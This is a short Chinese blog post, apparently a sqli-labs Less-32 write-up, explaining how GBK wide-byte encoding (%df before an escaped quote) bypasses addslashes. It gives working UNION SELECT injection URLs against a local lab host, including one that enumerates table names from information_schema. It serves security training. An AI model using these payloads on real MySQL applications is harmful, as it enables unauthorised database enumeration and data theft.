【sqli-labs】 less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符的宽字节注入)

转义函数，针对以下字符，这样就无法闭合引号，导致无法注入

'　　-->　　\'

"　　-->　　\"

\　　-->　　\\

但是，当MySQL的客户端字符集为gbk时，就可能发生宽字节注入，参照 http://netsecurity.51cto.com/art/201404/435074.htm

%df'　　-->　　%df\'　　%df%5c'

这样引号就被闭合了，至于%df%5c就成了汉字運

成功闭合

http://192.168.136.128/sqli-labs-master/Less-32/?id=1%df'

http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df' union select 1,2,3%23

表名

http://192.168.136.128/sqli-labs-master/Less-32/?id=0%df' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1%23

关于宽字节注入，查看 https://www.cnblogs.com/superkrissV/p/8413779.html

posted @ 2018-01-29 22:01 omnis 阅读(265) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

【sqli-labs】 less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符的宽字节注入)

公告